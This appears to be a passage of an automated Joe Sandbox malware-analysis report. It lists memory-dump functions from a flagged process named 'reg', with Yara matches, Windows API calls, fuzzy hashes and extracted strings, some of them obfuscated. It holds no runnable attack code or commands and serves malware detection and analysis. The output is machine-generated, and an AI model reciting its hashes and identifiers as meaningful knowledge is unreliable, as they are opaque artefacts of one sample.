                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 86d479472fb2d9ceda1078d8cee44a141ef48acef7f1a38b0f9f0d019a356b31
                                                • Instruction ID: a270809c1f18a844845a91cda62ad4e7ceb32b9eec2e125553e8a9d5bbba15d0
                                                • Opcode Fuzzy Hash: 86d479472fb2d9ceda1078d8cee44a141ef48acef7f1a38b0f9f0d019a356b31
                                                • Instruction Fuzzy Hash: 1F0180B2204509BBDB48DF99DD81EEB77EDAF8C754F418218BA09E3241D634F8518BA4
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9765
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 4ddc6c21393efbfb1de144e7b600a65328063a2df9ac14992f13b191840df733
                                                • Instruction ID: f4d14bbe5ba17382ed03780dbd26e1eaea17c01a5ec014ebaa47dd19451bb56b
                                                • Opcode Fuzzy Hash: 4ddc6c21393efbfb1de144e7b600a65328063a2df9ac14992f13b191840df733
                                                • Instruction Fuzzy Hash: 4DF06D7338060476E36076E99C02FD7B78C9BC4B76F180426F70DEB1C0DAA6B84156A8
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9765
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: d9b90881fd8a7f68a220f2a3bf820bf0ecbf3c0dc62b1e0c38c44b21eb71fc23
                                                • Instruction ID: 20251328270fd64e7b6f977b270776b95ee9366147405ba55c9d00ef12be4da6
                                                • Opcode Fuzzy Hash: d9b90881fd8a7f68a220f2a3bf820bf0ecbf3c0dc62b1e0c38c44b21eb71fc23
                                                • Instruction Fuzzy Hash: CAF0927324061476E27072A98C06FE7B68CDF85B75F140419F70DAB1C0DAE6B84186F8
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,BC8D9489,00000007,00000000,00000004,00000000,02CE3F3A,000000F4,?,?,?,?,?), ref: 02CF85FC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction ID: 263ebdc199ea9083f8e591b5b73a8aa8ebf3d4976a7005d16ebacbf1e364edbb
                                                • Opcode Fuzzy Hash: 85b9538c6281af8b05fcab1f31e6d4afb2cc1f92716cd5a024de01b70d871b70
                                                • Instruction Fuzzy Hash: 84E0EDB16006047BD614EE99DC41FDB77ADEF85714F408419FA09A7241D671B911CBB4
                                                APIs
                                                • RtlAllocateHeap.NTDLL(02CE18A6,?,02CF48B1,02CE18A6,02CF48A7,02CF48B1,?,02CE18A6,02CF48A7,00001000,?,?,02CF9E40), ref: 02CF85AC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction ID: c4549eb26b732254a35d7e413078104fa1d6e60d33cc99f913a052b8a992a066
                                                • Opcode Fuzzy Hash: 38bc7af278630d5790ec7858ceff0b22a3025680cf158ac78260adce428242f9
                                                • Instruction Fuzzy Hash: C0E012716002087BDB14EF99DC41FDB77ADEFC5714F404419FA09A7241D670B9518BB4
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?), ref: 02CE7FAC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: b1209a9e472cea2492028bccd4f93571205a64cf1dde7bba1e3b049150618745
                                                • Instruction ID: de3d5a49f07a05709d5fee42f2f7277c72daff57b8f755956a7774559797c2f7
                                                • Opcode Fuzzy Hash: b1209a9e472cea2492028bccd4f93571205a64cf1dde7bba1e3b049150618745
                                                • Instruction Fuzzy Hash: 22E0867624020827FF246AA8DC45F76B3588BC876CF284660B92DDB2C1E67AF64545A1
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,02CE1B80,02CF6FC7,02CF48A7,?), ref: 02CE7DC3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 0eda40334b61d156b41ed8ce7e293b29b49843f04f20514bafed39ea13c4d92a
                                                • Instruction ID: 6699dc0a68bcca59f7ca1dc7589fd6fd7c1eb68ce4e70b5a6ea4697d89e8fb09
                                                • Opcode Fuzzy Hash: 0eda40334b61d156b41ed8ce7e293b29b49843f04f20514bafed39ea13c4d92a
                                                • Instruction Fuzzy Hash: 24D05EB22443043BF640B6E59C46F26328D5B8075CF084064BA0CE72C1E9A6F1005A65
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9765
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_2cd0000_reg.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: f8bcd30a29aa0707ceb7d8944c4ecc16d357de2e9c5a422d8a6d9e40a625528a
                                                • Instruction ID: 79f2540d415ec64aa11b230ff1998a50c82df3a74d43fc368664dd7b46dd86d5
                                                • Opcode Fuzzy Hash: f8bcd30a29aa0707ceb7d8944c4ecc16d357de2e9c5a422d8a6d9e40a625528a
                                                • Instruction Fuzzy Hash: 68D01236380614B1F1B029599C42FA992088FC0B16F350416F308E91C0869268454028
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 55468022d3a848b25242ee55ede8398d7b50cd3b064dd0b02a463414de0f3cd6
                                                • Instruction ID: ec80e57e9c9c71dd11281f3af909b24476ecf0c8c6f7c4fa885cc543154018c5
                                                • Opcode Fuzzy Hash: 55468022d3a848b25242ee55ede8398d7b50cd3b064dd0b02a463414de0f3cd6
                                                • Instruction Fuzzy Hash: FAB04C71A019C995EA11E764560861A79447790711F19C462D2020652A47299191E175
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129910472.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3420000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3558027158
                                                • Opcode ID: 727c4c1466ffcd7d94700a0b6b9115cb144e492d2d7dd19bd3bfc639422cd25d
                                                • Instruction ID: c84368720a189c2acc32da5052137415e897d78009bb84c403ca4e418c7c0076
                                                • Opcode Fuzzy Hash: 727c4c1466ffcd7d94700a0b6b9115cb144e492d2d7dd19bd3bfc639422cd25d
                                                • Instruction Fuzzy Hash: 15914FF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7A6BB243C3BE8945CB85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129910472.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3420000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: &$n$ 11-$ 5(.$ 7('$$#1m$$n 1$&$n6$(" 5$(, &$(./n$-m 1$/&mk$/n9)$0|qo$1-("$5$95$5,-j$9,-m$9,-z$m(, $n)5,$nkz0$xm(,$|qoy
                                                • API String ID: 0-2801251792
                                                • Opcode ID: b9ad030fc7b4968b14350e04c4caf3834b2f027c68668689d4c95212abf4c960
                                                • Instruction ID: 8a1cac1d568e07110f5e31d2d0c51e9a3234a05f4f3e3b7dc032b22ce0423667
                                                • Opcode Fuzzy Hash: b9ad030fc7b4968b14350e04c4caf3834b2f027c68668689d4c95212abf4c960
                                                • Instruction Fuzzy Hash: E83185B440470DDBCB29DF90D9416DEBBB2FF05304F81565EE8086E241C67A8A95CB89
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: ad5bf9dabe357113bc94acbc74b5c9ffba7cf372ef2e0b22e5fbb2f2602fe66b
                                                • Instruction ID: 306c0a5fdcea7f57ff43bc398d3c696d871787ba45c121bf4baf0fcc9c31fda3
                                                • Opcode Fuzzy Hash: ad5bf9dabe357113bc94acbc74b5c9ffba7cf372ef2e0b22e5fbb2f2602fe66b
                                                • Instruction Fuzzy Hash: 6951FBB5A0025EBFDF10DB98E88057EFBBCBB48204B54C96AE465D7651D334DE508BE0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: f1a05b031dcc628b1c53f42712b5623b48e34f43a01da84fb52b7e6ad5566aa7
                                                • Instruction ID: 9c1bdbb14bd506c2f4d24970321a5cd305ede4963b3f0e0cd273ceaf50942ef6
                                                • Opcode Fuzzy Hash: f1a05b031dcc628b1c53f42712b5623b48e34f43a01da84fb52b7e6ad5566aa7
                                                • Instruction Fuzzy Hash: 5D510675A00645AECB38DF9CC9A587FF7FDEF48204B04885AE495D76C1E7B4DA408760
                                                Strings
                                                • Execute=1, xrefs: 035C4713
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035C4725
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035C46FC
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035C4742
                                                • ExecuteOptions, xrefs: 035C46A0
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 035C4787
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035C4655
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: 20819fbb7faeba2122de0655d56d3a87ac5e7814a2d0b2363888522e3e4d48a5
                                                • Instruction ID: f1fdd30d3aae621a7a272eb1e7f2dc351fe6fe0f3d52cbf293e0d5dcb5ebe518
                                                • Opcode Fuzzy Hash: 20819fbb7faeba2122de0655d56d3a87ac5e7814a2d0b2363888522e3e4d48a5
                                                • Instruction Fuzzy Hash: 69511735A00319AADF21FFA5FC95FAD77B8BF49304F180499D505BB1B1EB709A41CA90
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: ce116aad0911e084e10b5adc1d2d8f33aa2413ea191b6eb5c2f662bf8f8ebd81
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: B3023274608752AFD704CF18C990A6ABBF5EFC8710F05892DF9899B264DB71E905CF42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: 01fc9bb4a76be31ac64bf7b31ff5d24c4f08b5ef564bdd5e7597735c67284e66
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: 7F819E74E052499AFF24CF68F8917BEBBB6BF85310F1C469BD851A73A0C73499408B91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 2c8052994756359aacfb7b080acea5d8f670b5eecda50bb7bedae14f578c2d5d
                                                • Instruction ID: 006a17787a19bbd6660caf2c748bdde27d2419f3e43336b6a1145b496efb6655
                                                • Opcode Fuzzy Hash: 2c8052994756359aacfb7b080acea5d8f670b5eecda50bb7bedae14f578c2d5d
                                                • Instruction Fuzzy Hash: 6021B27AE00219ABDB14DF79DD55AEFBBF8EF44644F080556EA04E3240E730DA118BA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129910472.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3420000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SzXE$U^FB$]TfT$]XZT$rYC^$|^KX
                                                • API String ID: 0-3184614907
                                                • Opcode ID: bbd2849eaa63d1a6eb161249598496b8c2ceab0f527ae7354ed56e852160a3a1
                                                • Instruction ID: 42b47483ad70b9a5298b3b47ea91afae38a6b11b078733f20d83eec0f46fbfcc
                                                • Opcode Fuzzy Hash: bbd2849eaa63d1a6eb161249598496b8c2ceab0f527ae7354ed56e852160a3a1
                                                • Instruction Fuzzy Hash: 292155B041074DDACF24DF84C0046EEBBB1FF18319F81809EE91A6F202D7768699CB85
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 035C031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035C02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035C02E7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: b5976197b87d4c31974695129d28f38b7f0bbc37bdbb34f8ce16b0bde1b13105
                                                • Instruction ID: 23951450ead97aa9ec2eb672cfd6d159063cde6df0c1772ceab9afb19d4008f7
                                                • Opcode Fuzzy Hash: b5976197b87d4c31974695129d28f38b7f0bbc37bdbb34f8ce16b0bde1b13105
                                                • Instruction Fuzzy Hash: 6BE1BE34614781DFD724CF68E884B2AB7E0BB84718F180A5DF4A58B2F1D774D844CB82
                                                Strings
                                                • RTL: Resource at %p, xrefs: 035C7B8E
                                                • RTL: Re-Waiting, xrefs: 035C7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035C7B7F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 2908c0ca484c79d31c3159adbec3c2137eafe77a54cd50d57bf3ea7781ac90f9
                                                • Instruction ID: 13dd0d7b8042446e112b5005bcd4151072273bc1d4c1c057fae87fb4aef06c8e
                                                • Opcode Fuzzy Hash: 2908c0ca484c79d31c3159adbec3c2137eafe77a54cd50d57bf3ea7781ac90f9
                                                • Instruction Fuzzy Hash: 9D41E1353007029FD724EF69E840B2AB7E9FF89714F040A1DF856AB6A0EB70E4058F91
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035C728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 035C72A3
                                                • RTL: Re-Waiting, xrefs: 035C72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035C7294
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 65369b2e7aaa83cf4519be05b70b25d752ab750504f45eff0f6f877a2a0f704b
                                                • Instruction ID: e6ff4cc2cdce922cfad03e2e7af2bdd7a76e4a7fd807fba0ac3c0dc24b1eb9ac
                                                • Opcode Fuzzy Hash: 65369b2e7aaa83cf4519be05b70b25d752ab750504f45eff0f6f877a2a0f704b
                                                • Instruction Fuzzy Hash: 9E412235700242AFD720DF64EC41F2AB7AAFB88714F180A19F855AB660DB21F8028BD0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: af05984b7934f8d80c6a1ad40b727c80d902972a4057f179a2071ed964b6e7a8
                                                • Instruction ID: ad0d29331bc8ac4420df3d1d5617122ad9370a3b6ca78ca3431189ec4722a9ca
                                                • Opcode Fuzzy Hash: af05984b7934f8d80c6a1ad40b727c80d902972a4057f179a2071ed964b6e7a8
                                                • Instruction Fuzzy Hash: C731B876A002199FCB28DF39DD55BEFB7F8FF44600F444456E849D3280EB309A548B60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: 72f4747966f370cb8496a05321a19c383e597a64855c6f2f51be0a985b5a2b2f
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: B8919370E102169FFF24DF69E8816BEB7B5FF88720F58455BE865A72E0E73099408750
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.4129989317.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Offset: 03520000, based on PE: true
                                                • Associated: 00000011.00000002.4129989317.0000000003649000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.000000000364D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.4129989317.00000000036BE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_3520000_reg.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 90a742baee697aaac641c709b79e41d6bd3be47fa36244c8a1af39390e92a097
                                                • Instruction ID: c075b4c7dffd0f0dae77293331f7bfc9bf771a754c660b2b4d095fd8a1f94ffa
                                                • Opcode Fuzzy Hash: 90a742baee697aaac641c709b79e41d6bd3be47fa36244c8a1af39390e92a097
                                                • Instruction Fuzzy Hash: 6E8129B5D00269DBDB21DF54DC44BEEB7B8BB48750F0445EAA919B7290E7309E84CFA0